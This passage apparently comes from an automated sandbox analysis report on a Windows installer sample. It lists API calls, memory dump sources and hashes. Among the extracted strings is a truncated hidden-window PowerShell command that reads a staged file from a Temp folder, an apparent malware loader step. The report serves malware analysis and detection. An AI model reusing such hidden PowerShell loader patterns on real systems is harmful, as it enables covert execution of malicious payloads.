            • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040582F
            • GetLastError.KERNEL32 ref: 0040583D
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CreateDirectoryErrorLast
            • String ID:
            • API String ID: 1375471231-0
            • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
            • Instruction ID: d963a2520b22da8993c1f0374a54a6368e12bf2bf52e26206a68f99a8800bbf8
            • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
            • Instruction Fuzzy Hash: 1DC04C31204B029AD7506B609F097177954AB50781F11C8396946E00A0DE348465DE2D
            APIs
            • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040CF79,0040CED0,004032EF,0040CED0,0040CF79,00414ED0,00004000,?,00000000,00403119,00000004), ref: 00405E19
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: FileWrite
            • String ID:
            • API String ID: 3934441357-0
            • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
            • Instruction ID: dac0b8971ba2920abb5474f128329a0fa477ab7403896bbfc0984bb8014ca22f
            • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
            • Instruction Fuzzy Hash: 4AE08632100119ABCF105F50DC00EEB376CEB00350F004832FA65E2040E230EA219BE4
            APIs
            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Open
            • String ID:
            • API String ID: 71445658-0
            • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
            • Instruction ID: ef45ff86538a2d51f1b0222ec8c1b297abd10be8bd22699319dc95f068cee933
            • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
            • Instruction Fuzzy Hash: CCE08676244108BFDB00DFA8DE47FD537ECAB14700F004031BA08D70D1C674E5508768
            APIs
            • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040336B,0040A230,0040A230,0040326F,00414ED0,00004000,?,00000000,00403119), ref: 00405DEA
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
            • Instruction ID: f39de87387fc754cac4ceee649b5e38243fe2bf9183d254406dbd5143e25ae03
            • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
            • Instruction Fuzzy Hash: 57E0EC3221125AABDF509F65DC08AEB7B6DEF05360F008837F955E6160D631E9219BE8
            APIs
            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
            • Instruction ID: 8584b4a80e8197aea4c9dd325401cbfcfbe68695eba590e205f4256e4e85e437
            • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
            • Instruction Fuzzy Hash: 67C04C71740600BBDA20CB649D45F1677546754740F1448697640A60E0C674D420D62C
            APIs
            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
            • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
            • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
            • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
            APIs
            • SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
            • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
            • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
            • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
            APIs
            • KiUserCallbackDispatcher.NTDLL(?,0040403C), ref: 0040426E
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CallbackDispatcherUser
            • String ID:
            • API String ID: 2492992576-0
            • Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
            • Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
            • Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
            • Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59
            APIs
            • GetDlgItem.USER32(?,000003F9), ref: 00404C71
            • GetDlgItem.USER32(?,00000408), ref: 00404C7C
            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CC6
            • LoadBitmapW.USER32(0000006E), ref: 00404CD9
            • SetWindowLongW.USER32(?,000000FC,00405251), ref: 00404CF2
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D06
            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D18
            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D2E
            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3A
            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D4C
            • DeleteObject.GDI32(00000000), ref: 00404D4F
            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7A
            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D86
            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E1C
            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E47
            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E5B
            • GetWindowLongW.USER32(?,000000F0), ref: 00404E8A
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E98
            • ShowWindow.USER32(?,00000005), ref: 00404EA9
            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FA6
            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040500B
            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405020
            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405044
            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405064
            • ImageList_Destroy.COMCTL32(?), ref: 00405079
            • GlobalFree.KERNEL32(?), ref: 00405089
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405102
            • SendMessageW.USER32(?,00001102,?,?), ref: 004051AB
            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BA
            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DA
            • ShowWindow.USER32(?,00000000), ref: 00405228
            • GetDlgItem.USER32(?,000003FE), ref: 00405233
            • ShowWindow.USER32(00000000), ref: 0040523A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
            • String ID: $M$N
            • API String ID: 1638840714-813528018
            • Opcode ID: c57cb45ce89cd192e0511e30eec95623b06f81766ebd804847a276e94d887aeb
            • Instruction ID: ce840dee0c3a5b827351c7f25dbf2e3605d0905f5c54158640504e6bfb71dde6
            • Opcode Fuzzy Hash: c57cb45ce89cd192e0511e30eec95623b06f81766ebd804847a276e94d887aeb
            • Instruction Fuzzy Hash: 4C023EB0A00209EFDF209F64CD45AAE7BB5FB84355F10817AE610BA2E1C7799D52CF58
            APIs
            • GetDlgItem.USER32(?,000003FB), ref: 0040472C
            • SetWindowTextW.USER32(00000000,?), ref: 00404756
            • SHBrowseForFolderW.SHELL32(?), ref: 00404807
            • CoTaskMemFree.OLE32(00000000), ref: 00404812
            • lstrcmpiW.KERNEL32(: Completed,00423728,00000000,?,?), ref: 00404844
            • lstrcatW.KERNEL32(?,: Completed), ref: 00404850
            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404862
              • Part of subcall function 004058A7: GetDlgItemTextW.USER32(?,?,00000400,00404899), ref: 004058BA
              • Part of subcall function 00406412: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rArz0wnYVU.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
              • Part of subcall function 00406412: CharNextW.USER32(?,?,?,00000000), ref: 00406484
              • Part of subcall function 00406412: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rArz0wnYVU.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
              • Part of subcall function 00406412: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rArz0wnYVU.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404925
            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404940
              • Part of subcall function 00404A99: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
              • Part of subcall function 00404A99: wsprintfW.USER32 ref: 00404B43
              • Part of subcall function 00404A99: SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
            Strings
            • A, xrefs: 00404800
            • powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr, xrefs: 004046F6
            • : Completed, xrefs: 0040483E, 00404843, 0040484E
            • C:\Users\user\AppData\Local\Temp\alkylsulfater, xrefs: 0040482D
            • (7B, xrefs: 004047DA
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
            • String ID: (7B$: Completed$A$C:\Users\user\AppData\Local\Temp\alkylsulfater$powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr
            • API String ID: 2624150263-2289760153
            • Opcode ID: 6710b452078c694e0029326020044f04b78e1add479f5b8bf31089acd2767570
            • Instruction ID: d5aaf60bd55b21875b9c8b9a8d0b3d7e01f34e6f89f3adcbdcc63617e1d21faf
            • Opcode Fuzzy Hash: 6710b452078c694e0029326020044f04b78e1add479f5b8bf31089acd2767570
            • Instruction Fuzzy Hash: B7A191F1A00209ABDB11AFA5CC45AAF77B8EF84354F10847BF601B62D1D77C99418B6D
            APIs
            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: FileFindFirst
            • String ID:
            • API String ID: 1974802433-0
            • Opcode ID: 51f18150437c144cd66edcff000563471467b4270039c502952ea3edf421ef17
            • Instruction ID: ca82d2f7608ddbe9a9db451b4e667c54ef54e9945bbc135f2cbc761c4928cd6d
            • Opcode Fuzzy Hash: 51f18150437c144cd66edcff000563471467b4270039c502952ea3edf421ef17
            • Instruction Fuzzy Hash: 3CF08275600114DBC711EBE4DD49AAEB374FF00324F2045BBE105F31E1D7B499559B2A
            APIs
            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040447D
            • GetDlgItem.USER32(?,000003E8), ref: 00404491
            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044AE
            • GetSysColor.USER32(?), ref: 004044BF
            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044CD
            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044DB
            • lstrlenW.KERNEL32(?), ref: 004044E0
            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044ED
            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404502
            • GetDlgItem.USER32(?,0000040A), ref: 0040455B
            • SendMessageW.USER32(00000000), ref: 00404562
            • GetDlgItem.USER32(?,000003E8), ref: 0040458D
            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D0
            • LoadCursorW.USER32(00000000,00007F02), ref: 004045DE
            • SetCursor.USER32(00000000), ref: 004045E1
            • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 004045F6
            • LoadCursorW.USER32(00000000,00007F00), ref: 00404602
